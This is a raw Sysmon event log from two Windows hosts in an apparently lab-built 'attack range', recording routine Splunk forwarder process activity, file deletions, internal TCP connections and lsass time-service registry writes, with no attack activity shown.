10341000x8000000000000000287522Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:20.507{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-1130-6216-0305-000000003802}4376C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000287521Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:20.507{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1130-6216-0305-000000003802}4376C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000287520Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:20.509{C8EA50B7-1130-6216-0305-000000003802}4376C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000287519Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:20.492{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BC159741FB64A56D17918792AA13977,SHA256=48FEA6369CAFDF3F2BD3787D064C5B017B9ABDB3906B8E4FCFD79C551B5347D8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000287518Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:20.132{C8EA50B7-112F-6216-0205-000000003802}42004972C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000216395Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:21.753{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9398DD44F1D299A02F299C7160625C67,SHA256=8E00E8FF1D139C0E9602DCB99BCA4CDEC4516A594893B0238F7778CBBE4B3D1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287538Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:21.523{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5755230C255217CCB7C0A9FFF726F663,SHA256=FF2C58FBE82DAA30F071B2DFEA304708DFE6E882B199A57FE689DD8484DD1E4E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287537Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:18.684{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53422-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000287536Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:21.008{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1131-6216-0405-000000003802}708C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287535Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:21.008{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287534Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:21.008{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287533Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:21.008{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-1131-6216-0405-000000003802}708C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000287532Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:21.008{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287531Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:21.008{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287530Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:21.008{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1131-6216-0405-000000003802}708C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000287529Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:21.009{C8EA50B7-1131-6216-0405-000000003802}708C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000287539Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:22.539{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36F751BB6D019CFA31C9D84BFEEECEFC,SHA256=604BBF6E49DC78D67DA6844425D9778114C9CEA620F95A8F6DD92F13D81DBA6F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216396Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:22.769{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16F6E482B665B536649466694E2F0D20,SHA256=A390AD99A992969FBBBA146F02FB889D46B88E1650FCDC72BC3B997048F9F7D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287540Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:23.554{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89F92D177F7887C1DEAAD422D56EF216,SHA256=C968AFBE7F1092DDD99D2F4FF851083ACDA1CFD5558236A8366E3B15721B6492,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216398Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:23.784{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D262CC807D72BE417E6191C1E4710E4,SHA256=130A0CE223BF66548C3CC29BF78ACAC104D06ED492CFB502F8C242E9A8C9712A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216397Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:21.507{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51324-false10.0.1.12-8000- 23542300x8000000000000000216399Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:24.800{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E021AC3496805039138E577620AC07F,SHA256=6001B9406150513A78BE77CB2CF374EC2E137B8D7F8BDFD0CF345894BF1A3E5A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287541Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:24.585{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80156FBAEBED8C81DCFDD4F850228BA1,SHA256=1219CE957492696B12D740A41B38922BC9B91C286FC2106E87E339652ECF2E16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216400Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:25.815{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0DBDDAEA527FE9C95AC913CDB64DE666,SHA256=C605E40291132E0728846733BFF0CB06F57804B09D9ECC51A7E40C261B211E2C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287542Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:25.648{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F3845B8D1B2EF25E2FC05BE898C354B,SHA256=9DC1DA01CFFB3BDF1545AFF02FFA68D11AFD6FA594A58603F28AB843D445C409,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287554Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:26.710{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A9CF86495776CEE722BF71A18CDEEFE,SHA256=46B8432BDEF6278B63FB1BA0A4D65DA910ED37D7E771F16DB882AAE416B32CA5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216401Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:26.831{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65F69218219DB863C054C3193A7E7734,SHA256=4EF6E5AF7D69626A6C866B42367E3273D741B5F4A9A38B89F57CDFA175E07B8E,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000287553Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:49:26.664{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000287552Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:49:26.664{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x007d7c83) 13241300x8000000000000000287551Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:49:26.664{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d8289a-0xa4da04f9) 13241300x8000000000000000287550Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:49:26.664{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d828a3-0x069e6cf9) 13241300x8000000000000000287549Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:49:26.664{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d828ab-0x6862d4f9) 13241300x8000000000000000287548Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:49:26.664{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000287547Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:49:26.664{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x007d7c83) 13241300x8000000000000000287546Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:49:26.664{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d8289a-0xa4da04f9) 13241300x8000000000000000287545Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:49:26.664{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d828a3-0x069e6cf9) 13241300x8000000000000000287544Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:49:26.664{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d828ab-0x6862d4f9) 354300x8000000000000000287543Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:24.574{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53423-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000287555Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:27.710{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54522AE3A908FFE8B2DE849A073117F5,SHA256=CB86D8D8C5FD6E25DAE52026AF08B0BE259518DE7ADB2A865011FD49B6E8CE3B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216402Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:27.847{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5F2E362B8207A2E86163279FE8B137B,SHA256=5A33D35E0A3F283E5F9BC7A63C63C98D6D783330D6FA586A78BEA6351F720F2A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287556Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:28.773{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9BAE9B4E86561F2BEC1600515D0AAC4,SHA256=6AE87806F1EF46A05C0D140005AA22149D5EC2FF021DE799461B1C4A645C0754,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216404Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:28.862{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0DABE7A10A6ADC550AB98A1265706FF1,SHA256=972BE38632D0351D9F01ADD349A2CF4670E90387289FA05F3275FA9B2EFA9FB2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216403Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:26.554{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51325-false10.0.1.12-8000- 23542300x8000000000000000216405Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:29.878{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A7BE58FED73399DBE231BE97403C9E7,SHA256=3C4DC070BE1B65A2D856A14988DB82BC46AA8E05A34A4779146AB2659F0CC872,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287557Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:29.804{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=376EC3110DBD4068E6943BFB832BDA7D,SHA256=18EC7E253D1CCFE46DC710BC0E976CF0DB1CFD1949D9130FBBE9F68FF31BB761,IMPHASH=00000000000000000000000000000000falsetrue 